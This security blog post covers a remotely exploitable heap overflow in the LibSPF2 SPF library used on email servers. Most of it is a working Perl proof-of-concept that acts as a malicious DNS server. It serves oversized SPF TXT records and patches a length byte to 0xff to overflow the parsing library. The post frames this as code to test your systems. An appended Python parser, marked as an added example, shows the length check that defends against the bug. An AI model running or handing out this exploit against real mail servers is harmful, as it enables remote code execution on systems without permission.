
I hate to pound the drum for cyber security threats to national security again, but here is a perfect example of an issue that has been around for more than 6 years and potentially affects countless applications and tools. A quick search on Google’s Code Search reveals about 1,000 results for LibSPF2.
A heap overflow vulnerability exists in the LibSPF2 library that allows a remote, unauthenticated user to execute code. LibSPF2 is a library frequently used to retrieve Sender Policy Framework (SPF) records and apply policies according to those records. The interesting point is that this library was designed to run on Internet-accessible email servers. Who do you fire in an organization for installing or using vulnerable applications? The bigger question is “would anyone be left?”
The following is some code to test your systems for this vulnerability.
Simple code to reproduce the heap overflow:
# cat spfattack.pl
#!/usr/bin/perl
#
# Test DNS server: answers TXT queries with an SPF record followed by a
# second, oversized string, then patches a length byte before replying.
use Net::DNS;
use IO::Socket::INET;
use Data::HexDump;

my $qclass = "IN";
my $ttl    = 10;

while (1) {
    # Wait for one DNS query on UDP/53.
    my $sock = IO::Socket::INET->new(
        LocalPort => '53',
        Proto     => 'udp');
    $sock->recv($newmsg, 2048);
    my $req = Net::DNS::Packet->new(\$newmsg);
    $req->print;
    my $id    = $req->header->id();
    my @q     = $req->question;
    my $qname = $q[0]->qname;
    my $qtype = $q[0]->qtype;
    if ($qtype eq "PTR") { next; }

    $answer = Net::DNS::Packet->new($qname, $qtype);
    if ($qtype eq "TXT") {
        $answer->push(answer => Net::DNS::RR->new("$qname 0 $qclass $qtype 'v=spf1 mx +all'"));
        my $spf = "A" x 233;
        $answer->push(answer => Net::DNS::RR->new("$qname 0 $qclass $qtype '$spf'"));
    }
    if ($qtype eq "MX") {}
    $answer->header->id($id);
    $answer->header->aa(1);
    $answer->header->qr(1);
    $answer->print;

    # Remember the client, then reopen the socket bound to it for the reply.
    my $port = $sock->peerport;
    my $peer = inet_ntoa($sock->peeraddr);
    $sock->shutdown(2);
    $sock = "";
    my $tempsock = IO::Socket::INET->new(
        LocalPort => '53',
        PeerAddr  => "$peer",
        PeerPort  => $port,
        Proto     => 'udp');
    my $newans;
    $newans = $answer->data;
    if ($qtype eq "TXT") {
        # Overwrite the TXT character-string length byte with 0xff.
        substr($newans, 44, 1, pack("c", 0xff));
        print HexDump $newans;
    }
    $tempsock->send($newans);
    #my $packet = Net::DNS::Packet->new(\$newmsg);
}
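The defender-side counterpart to the test script above, added here as an example and not part of the original post or of LibSPF2: a TXT RDATA parser that checks every character-string length byte against the bytes actually present before copying anything, which is the check that stops a patched 0xff length byte from being trusted. The sample records are constructed for this example, and the 450-byte cap on the joined SPF string is an assumed bound, not a value from the page.

```python
def parse_txt_rdata(rdata: bytes):
    """Split DNS TXT RDATA into its <length><data> character-strings.

    Returns (True, [strings]) or (False, reason). The declared length is
    validated against the remaining buffer, so no read goes past the end.
    """
    strings = []
    pos = 0
    while pos < len(rdata):
        declared = rdata[pos]          # one-byte length prefix, 0..255
        pos += 1
        remaining = len(rdata) - pos
        if declared > remaining:
            return False, (f"length byte {declared} at offset {pos - 1} "
                           f"exceeds remaining {remaining} bytes")
        strings.append(rdata[pos:pos + declared])
        pos += declared
    return True, strings


def spf_record_from_txt(rdata: bytes, max_len: int = 450):
    """Return the SPF record carried by TXT RDATA, or None if it is malformed.

    Per SPF, the character-strings of one TXT record are concatenated before
    parsing. max_len is an assumed upper bound for this example.
    """
    ok, result = parse_txt_rdata(rdata)
    if not ok:
        return None
    joined = b"".join(result)
    if not joined.startswith(b"v=spf1") or len(joined) > max_len:
        return None
    return joined.decode("ascii", errors="replace")


# Constructed sample RDATA for this example.
GOOD_RDATA = b"\x0e" + b"v=spf1 mx +all"          # one 14-byte string
SPLIT_RDATA = b"\x06" + b"v=spf1" + b"\x08" + b" mx +all"  # two strings
# Length byte claims 255 bytes but only 233 follow, like the patched packet.
BAD_RDATA = b"\xff" + b"A" * 233

if __name__ == "__main__":
    for name, rd in (("good", GOOD_RDATA), ("split", SPLIT_RDATA), ("bad", BAD_RDATA)):
        print(name, parse_txt_rdata(rd)[0], spf_record_from_txt(rd))
```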